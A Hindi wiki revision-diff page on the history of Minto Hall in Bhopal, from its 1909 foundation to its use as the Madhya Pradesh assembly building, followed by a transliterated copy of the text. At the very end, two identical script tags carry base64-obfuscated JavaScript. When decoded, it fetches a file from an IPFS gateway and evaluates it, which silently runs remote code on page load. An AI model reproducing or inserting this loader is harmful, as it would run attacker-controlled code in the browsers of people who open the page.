Difference between revisions of "मिन्टो हॉल (भोपाल)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
'''मिन्टो हॉल''' [[भोपाल]], [[मध्य प्रदेश]] की ऐतिहासिक इमारतों में से एक है। [[12 नवम्बर]] सन [[1909]] में सुल्तान जहाँ बेगम ने राज्य में आने वाले विशेष अतिथियों के लिए [[वायसराय]] [[लॉर्ड मिन्टो द्वितीय|लॉर्ड मिन्टो]] से इस भवन की आधारशिला रखवाई थी। इस भवन का आकार जॉर्ज पंचम के मुकुट के समान था।
 
'''मिन्टो हॉल''' [[भोपाल]], [[मध्य प्रदेश]] की ऐतिहासिक इमारतों में से एक है। [[12 नवम्बर]] सन [[1909]] में सुल्तान जहाँ बेगम ने राज्य में आने वाले विशेष अतिथियों के लिए [[वायसराय]] [[लॉर्ड मिन्टो द्वितीय|लॉर्ड मिन्टो]] से इस भवन की आधारशिला रखवाई थी। इस भवन का आकार जॉर्ज पंचम के मुकुट के समान था।
  
*इस भवन के निर्माण की अधिकांश सामग्री [[इंग्लैंड]] से मंगाई गई थी।  
+
*इस भवन के निर्माण की अधिकांश सामग्री [[इंग्लैंड]] से मंगवाई गई थी।  
 
*तत्कालीन समय में इस भवन की निर्माण लागत लगभग तीन लाख रुपये थी।
 
*तत्कालीन समय में इस भवन की निर्माण लागत लगभग तीन लाख रुपये थी।
 
*काफ़ी लम्बे समय तक मिन्टो हॉल का उपयोग भोपाल राज्य की सेना के मुख्यालय के रूप में होता रहा, जिसे बाद में 'लेक व्यू' होटल में परिवर्तित कर दिया गया।
 
*काफ़ी लम्बे समय तक मिन्टो हॉल का उपयोग भोपाल राज्य की सेना के मुख्यालय के रूप में होता रहा, जिसे बाद में 'लेक व्यू' होटल में परिवर्तित कर दिया गया।
*नवाब हमीदुल्ला के समय इसका फर्श संगमरमर का बनवाया गया और उनकी बड़ी बेटी आबिदा बेगम ने इसे स्केटिंग का मैंदान बना दिया।
+
*नवाब हमीदुल्ला के समय इसका फर्श संगमरमर का बनवाया गया और नवाब की बड़ी बेटी आबिदा बेगम ने इसे स्केटिंग का मैदान बना दिया।
 
*बाद के समय में इस हॉल का एक हिस्सा पुलिस मुख्यालय तथा सुरक्षा विभाग को दे दिया गया।
 
*बाद के समय में इस हॉल का एक हिस्सा पुलिस मुख्यालय तथा सुरक्षा विभाग को दे दिया गया।
*[[1946]] में इसे इंटर कालेज बनाया गया, जो बाद में 'हमीदिया कॉलेज' के रूप में स्थापित हुआ। ये कॉलेज [[1956]] तक चलता रहा।
+
*[[1946]] में इसे इंटर कॉलेज बनाया गया, जो बाद में 'हमीदिया कॉलेज' के रूप में स्थापित हुआ। ये कॉलेज [[1956]] तक चलता रहा।
 
*[[सितम्बर]] 1956 में इसका चयन विधानसभा भवन के लिये हुआ और [[1 नवम्बर]], 1956 से इसका [[मध्य प्रदेश]] के विधानसभा भवन के रूप में प्रयोग होने लगा।<ref>{{cite web |url=http://citybhopal.com/Kyadekhen.html |title=मिन्टो हॉल |accessmonthday=12 अक्टूबर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
 
*[[सितम्बर]] 1956 में इसका चयन विधानसभा भवन के लिये हुआ और [[1 नवम्बर]], 1956 से इसका [[मध्य प्रदेश]] के विधानसभा भवन के रूप में प्रयोग होने लगा।<ref>{{cite web |url=http://citybhopal.com/Kyadekhen.html |title=मिन्टो हॉल |accessmonthday=12 अक्टूबर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
  

Latest revision as of 13:32, 25 October 2012

minto h aaul bhopal, madhy pradesh ki aitihasik imaratoan mean se ek hai. 12 navambar san 1909 mean sultan jahaan begam ne rajy mean ane vale vishesh atithiyoan ke lie vayasaray l aaurd minto se is bhavan ki adharashila rakhavaee thi. is bhavan ka akar j aaurj pancham ke mukut ke saman tha.

  • is bhavan ke nirman ki adhikaansh samagri ianglaiand se mangavaee gee thi.
  • tatkalin samay mean is bhavan ki nirman lagat lagabhag tin lakh rupaye thi.
  • kafi lambe samay tak minto h aaul ka upayog bhopal rajy ki sena ke mukhyalay ke roop mean hota raha, jise bad mean 'lek vyoo' hotal mean parivartit kar diya gaya.
  • navab hamidulla ke samay isaka pharsh sangamaramar ka banavaya gaya aur navab ki b di beti abida begam ne ise sketiang ka maidan bana diya.
  • bad ke samay mean is h aaul ka ek hissa pulis mukhyalay tatha suraksha vibhag ko de diya gaya.
  • 1946 mean ise iantar k aaulej banaya gaya, jo bad mean 'hamidiya k aaulej' ke roop mean sthapit hua. ye k aaulej 1956 tak chalata raha.
  • sitambar 1956 mean isaka chayan vidhanasabha bhavan ke liye hua aur 1 navambar, 1956 se isaka madhy pradesh ke vidhanasabha bhavan ke roop mean prayog hone laga.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. minto h aaul (hindi). . abhigaman tithi: 12 aktoobar, 2012.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>